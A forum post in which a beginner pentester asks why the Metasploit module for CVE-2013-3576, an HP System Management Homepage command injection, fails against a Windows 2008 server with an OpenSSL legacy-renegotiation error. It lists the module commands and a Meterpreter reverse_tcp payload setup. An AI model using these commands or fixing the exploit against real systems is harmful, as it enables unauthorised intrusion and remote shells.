Error : unsafe legacy renegotiation disabled

Hello. I am newbie in programming and in penetration testing. I am interested in testing HP System Management Homepage JustGetSNMPQueue Command Injection vulnerability ([CVE-2013-3576] in one windows 2008 server. I installed Kali Linux 2022.3 to Virtualbox .I configured vm to use bridged adapter. I have internet through router. I opened metasploit framework. Typed :
use multi/http/hp_sys_mgmt_exec
set rhosts ‘ip of server’
set srvhost ‘local ip of kali linux’
I configured linux/x86/meterpreter/reverse_tcp payload with following command:
set lhosts ‘local ip of kali linux’
When i run exploit command this error occured :
Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 peeraddr=‘ip of server’:2381 state=error: unsafe legacy renegotiation disabled.
I searched on internet about this error and found that reason of this error is metasploit using new openssl to connect to old server. But i dont know how to fix this error. What i must write in ruby code of that exploit or what i must do in kali linux to fix this error ? Thanks.